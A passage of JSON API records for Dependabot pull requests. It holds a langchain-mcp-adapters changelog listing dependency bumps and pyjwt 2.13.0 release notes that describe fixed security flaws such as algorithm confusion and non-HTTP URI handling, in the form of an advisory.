href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/450\"\u003elangchain-ai/langchain-mcp-adapters#450\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump pytest from 8.4.2 to 9.0.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/451\"\u003elangchain-ai/langchain-mcp-adapters#451\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump websockets from 15.0.1 to 16.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/452\"\u003elangchain-ai/langchain-mcp-adapters#452\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump types-setuptools from 80.9.0.20250822 to 82.0.0.20260210 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/453\"\u003elangchain-ai/langchain-mcp-adapters#453\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump cryptography from 46.0.5 to 46.0.6 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/454\"\u003elangchain-ai/langchain-mcp-adapters#454\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump cryptography from 46.0.5 to 46.0.6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/455\"\u003elangchain-ai/langchain-mcp-adapters#455\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the minor-and-patch group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/461\"\u003elangchain-ai/langchain-mcp-adapters#461\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: patch 3 security alerts (high + low severity) by \u003ca href=\"https://github.com/jkennedyvz\"\u003e\u003ccode\u003e@​jkennedyvz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/463\"\u003elangchain-ai/langchain-mcp-adapters#463\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump cryptography from 46.0.6 to 46.0.7 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/473\"\u003elangchain-ai/langchain-mcp-adapters#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump cryptography from 46.0.6 to 46.0.7 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/471\"\u003elangchain-ai/langchain-mcp-adapters#471\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump langchain-core from 1.2.24 to 1.2.28 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/472\"\u003elangchain-ai/langchain-mcp-adapters#472\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump pytest from 8.3.5 to 9.0.3 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/476\"\u003elangchain-ai/langchain-mcp-adapters#476\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump pytest from 9.0.2 to 9.0.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/477\"\u003elangchain-ai/langchain-mcp-adapters#477\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-multipart from 0.0.22 to 0.0.26 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/481\"\u003elangchain-ai/langchain-mcp-adapters#481\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump langsmith from 0.6.3 to 0.7.31 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/482\"\u003elangchain-ai/langchain-mcp-adapters#482\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-multipart from 0.0.22 to 0.0.26 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/483\"\u003elangchain-ai/langchain-mcp-adapters#483\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-dotenv from 1.1.0 to 1.2.2 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/485\"\u003elangchain-ai/langchain-mcp-adapters#485\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-dotenv from 1.1.1 to 1.2.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/486\"\u003elangchain-ai/langchain-mcp-adapters#486\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(infra): harden Dependabot version-bound preservation by \u003ca href=\"https://github.com/open-swe\"\u003e\u003ccode\u003e@​open-swe\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/512\"\u003elangchain-ai/langchain-mcp-adapters#512\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump urllib3 from 2.6.3 to 2.7.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/506\"\u003elangchain-ai/langchain-mcp-adapters#506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump langsmith from 0.7.31 to 0.8.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/508\"\u003elangchain-ai/langchain-mcp-adapters#508\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the minor-and-patch group across 1 directory with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/513\"\u003elangchain-ai/langchain-mcp-adapters#513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump types-setuptools from 82.0.0.20260210 to 82.0.0.20260518 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/514\"\u003elangchain-ai/langchain-mcp-adapters#514\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump idna from 3.10 to 3.15 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/516\"\u003elangchain-ai/langchain-mcp-adapters#516\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-multipart from 0.0.26 to 0.0.27 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/504\"\u003elangchain-ai/langchain-mcp-adapters#504\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump pypa/gh-action-pypi-publish from 1.13.0 to 1.14.0 in the minor-and-patch group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/499\"\u003elangchain-ai/langchain-mcp-adapters#499\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the uv group across 1 directory with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/517\"\u003elangchain-ai/langchain-mcp-adapters#517\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump starlette from 0.50.0 to 1.0.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/537\"\u003elangchain-ai/langchain-mcp-adapters#537\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump starlette from 0.49.1 to 1.0.1 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/536\"\u003elangchain-ai/langchain-mcp-adapters#536\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mypy from 1.20.0 to 2.1.0 in the major group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/535\"\u003elangchain-ai/langchain-mcp-adapters#535\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the minor-and-patch group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/534\"\u003elangchain-ai/langchain-mcp-adapters#534\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: use non-deprecated streamable HTTP client by \u003ca href=\"https://github.com/mdrxy\"\u003e\u003ccode\u003e@​mdrxy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/541\"\u003elangchain-ai/langchain-mcp-adapters#541\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: surface MCP tool execution errors as failed tool output by \u003ca href=\"https://github.com/mdrxy\"\u003e\u003ccode\u003e@​mdrxy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/540\"\u003elangchain-ai/langchain-mcp-adapters#540\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease: 0.3.0 by \u003ca href=\"https://github.com/mdrxy\"\u003e\u003ccode\u003e@​mdrxy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/542\"\u003elangchain-ai/langchain-mcp-adapters#542\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-swe\"\u003e\u003ccode\u003e@​open-swe\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/512\"\u003elangchain-ai/langchain-mcp-adapters#512\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langchain-mcp-adapters/compare/langchain-mcp-adapters==0.2.2...langchain-mcp-adapters==0.3.0\"\u003ehttps://github.com/langchain-ai/langchain-mcp-adapters/compare/langchain-mcp-adapters==0.2.2...langchain-mcp-adapters==0.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain-mcp-adapters/commit/a61c783a7949719a8c3fbe4aeba961f45f3b7849\"\u003e\u003ccode\u003ea61c783\u003c/code\u003e\u003c/a\u003e release: 0.3.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/issues/542\"\u003e#542\u003c/a\u003e...\n\n_Description has been truncated_","html_url":"https://github.com/bogware/bog-agents/pull/130","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/bogware%2Fbog-agents/issues/130","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/130/packages"},{"uuid":"4658106420","node_id":"PR_kwDOSzUwoM7mMJzs","number":27,"state":"open","title":"⬆ Bump pyjwt from 2.10.1 to 2.13.0","user":"dependabot[bot]","labels":["internal"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-14T06:04:28.000Z","updated_at":"2026-06-14T06:06:48.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"⬆ Bump","packages":[{"name":"pyjwt","old_version":"2.10.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":null,"ecosystem":"pip"},"body":"Bumps [pyjwt](https://github.com/jpadilla/pyjwt) from 2.10.1 to 2.13.0.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e2.12.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd typing_extensions dependency for Python \u0026lt; 3.11 by \u003ca href=\"https://github.com/jpadilla\"\u003e\u003ccode\u003e@​jpadilla\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1151\"\u003ejpadilla/pyjwt#1151\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e2.12.0\u003c/h2\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eValidate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. by \u003ca href=\"https://github.com/dmbs335\"\u003e\u003ccode\u003e@​dmbs335\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f\"\u003eGHSA-752w-5fwx-jx9f\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in 